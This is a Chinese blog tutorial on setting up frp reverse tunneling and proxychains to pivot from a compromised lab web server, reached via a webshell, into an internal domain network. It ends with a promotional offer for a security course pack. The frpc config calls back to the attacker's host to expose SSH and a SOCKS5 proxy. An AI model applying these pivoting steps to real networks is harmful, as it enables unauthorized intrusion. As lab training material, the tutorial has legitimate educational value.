标题内网渗透–frp代理设置与proxychains代理设置
内网服务器 | 内网IP地址 | 外网IP地址 |
---|---|---|
内网web服务器(windows 7) | 192.168.52.143 | 192.168.213.138 |
内网域控服务器 | 192.168.52.138 | |
外网服务器 | 外网IP地址 | 外网V8网卡 |
— | — | — |
外网kali | 192.168.213.132 | |
外网windows攻击机 | 192.168.0.137 | 192.168.213.1 |
frps服务端配置
修改外网windows11主机上的frps.ini文件为:
![在这里插入图片描述](https://img-
blog.csdnimg.cn/2a8cbef148254ea39eda6f1a703f3986.png#pic_center)
[common]
bind_port = 7000 # 外网监听端口
启动监听:
./frps -c ./frps.ini
![在这里插入图片描述](https://img-
blog.csdnimg.cn/30dca1a378fd4c358f3088fc60e13b0c.png#pic_center)
frpc客户端配置
将经过修改的windows版本的frp通过蚁剑终端上传到wen服务器上
![在这里插入图片描述](https://img-
blog.csdnimg.cn/6dc01a49f48443c9afb7c702887ce309.png#pic_center)
[common]
server_addr = 192.168.0.137 # 外网windows地址
server_port = 7000 # 外网监听端口
[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000
[socks5] # socks5代理设置,kali使用该代理加入战斗
type = tcp
plugin = socks5
remote_port = 5000
frp连接建立
客户端主动启动链接
frpc.exe -c frpc.ini
![在这里插入图片描述](https://img-
blog.csdnimg.cn/5a3edd1957224249b272491d48244748.png#pic_center)
服务端的外网window11连接成功
![在这里插入图片描述](https://img-
blog.csdnimg.cn/57f102aeebea486383c3e20231767e81.png#pic_center)
kali socks 代理连接
由于刚刚在frpc客户端配置文件中写入了socks5代理,此时我们可以使用kali中的proxychains,设置socks5代理加入网络中
只需修改 /etc/proxychains4.conf 文件的最后一行就可以了
![在这里插入图片描述](https://img-
blog.csdnimg.cn/1381644f2f104da990a315f0180764ea.png#pic_center)
socks5 192.168.213.1 5000 # 192.168.213.1是外网win11的v8网卡地址
这样,我们就可以通过kali和自己的win11主机发动对内网的攻击了
学习计划安排
我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~
这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!!!
如果你对网络安全入门感兴趣,那么你需要的话可以
点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
①网络安全学习路线
②上百份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥HW护网行动经验总结
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析